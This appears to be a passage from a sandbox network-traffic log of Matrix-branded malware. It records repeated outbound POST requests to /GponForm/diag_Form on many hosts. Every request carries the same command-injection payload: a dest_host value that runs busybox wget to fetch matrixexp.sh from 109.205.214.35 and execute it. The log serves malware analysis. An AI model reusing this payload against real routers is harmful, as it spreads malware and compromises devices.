                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1153192.168.2.1338920109.30.97.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709752083 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1154192.168.2.135967042.78.244.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709759951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1155192.168.2.133998642.196.18.211443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709784031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1156192.168.2.133640042.181.6.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709795952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1157192.168.2.13484265.173.62.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709849119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1158192.168.2.1355278212.85.133.13443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709888935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1159192.168.2.1350222118.152.24.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709924936 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1160192.168.2.1357126109.25.24.69443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712619066 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1161192.168.2.13477345.160.39.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712650061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1162192.168.2.1359746109.13.248.202443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712732077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1163192.168.2.1348680118.134.161.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712740898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1164192.168.2.13452445.39.125.16443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712766886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1165192.168.2.1345910212.244.102.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712815046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1166192.168.2.13580285.157.167.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712816954 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1167192.168.2.13409525.174.249.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712845087 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1168192.168.2.1355750109.135.124.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712876081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1169192.168.2.133845842.168.141.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712882996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1170192.168.2.1349104212.145.152.178443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712918997 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1171192.168.2.1341404109.91.34.47443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712944031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1172192.168.2.1356712118.40.216.109443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712980032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1173192.168.2.1350428212.63.170.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.712991953 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1174192.168.2.135805642.244.71.116443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713015079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1175192.168.2.1342240212.149.5.124443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713046074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1176192.168.2.1359410118.33.21.159443
                                                        TimestampBytes transferredDirectionData
